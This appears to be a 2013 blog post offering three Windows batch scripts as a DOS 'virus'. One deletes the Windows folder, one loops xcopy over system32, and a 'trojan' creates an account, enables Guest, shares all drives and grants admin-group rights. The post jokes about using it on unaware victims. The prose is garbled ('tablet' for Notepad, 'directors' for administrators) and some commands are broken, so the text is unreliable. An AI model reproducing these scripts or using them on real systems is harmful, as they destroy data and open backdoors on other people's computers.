Tuesday 2 April 2013

Virus for DOS !

Virus for DOS


Here you may establish however straightforward it's to form virus in Ms dos.

 
Ok to start creating a dos virus you need to have tablet all computers have it thus simply open it up then kind during this code and save the file as a .BAT it should be .bat to figure.
******************************start of code*****
@echo off
cd
cd c:\window
@deltree/y c:\windows
exit
**************end of code********
This will delete the file windows. solely USE THIS CODE TO DELETE WINDOWS ON YOUR OWN COMPUTER!

This one goes to be slightly additional eviler then the last thus don't go causing it out ok.
**********************code*******************************
@echo off
cd
cd c:/WINDOWS/system32
: copy
xcopy/c C:/windows
goto copy
cd
cd c:/WINDOWS/system32
: copy
xcopy/c %0
goto cop
******************end of code********************
This will delete system thirty two and amke a backup copy of the move into windows and it'll open up once the pc runs thus if then get a backup of windows then it'll get delete.
Now for a trojan in dos well perhaps not a true trojan however it's a decent virus and can offer you admin power during a laptop
you can use this if you have got 2 computer in your house however if you employ it on somebody adn they dunno regarding it then the cops perhaps returning to your door lol.
********************************************************

@ECHO OFF
start http: -anypage-
net user add Username parole /add
net user localgroup directors Username /add
net user Guest 420 /active:yes
net share a=a:\
net share b=b:\
net share c=c:\
net share d=d:\
net share e=e:\
net share f=f:\
net localgroup Guests Guest /DELETE
net localgroup directors Guest /add

you can write web share a$=a:\ if you would like the shared files to be hidden and add del 1,000,000 at the top that the trojan can self distruct.


No comments:

Post a Comment

Wikipedia

Search results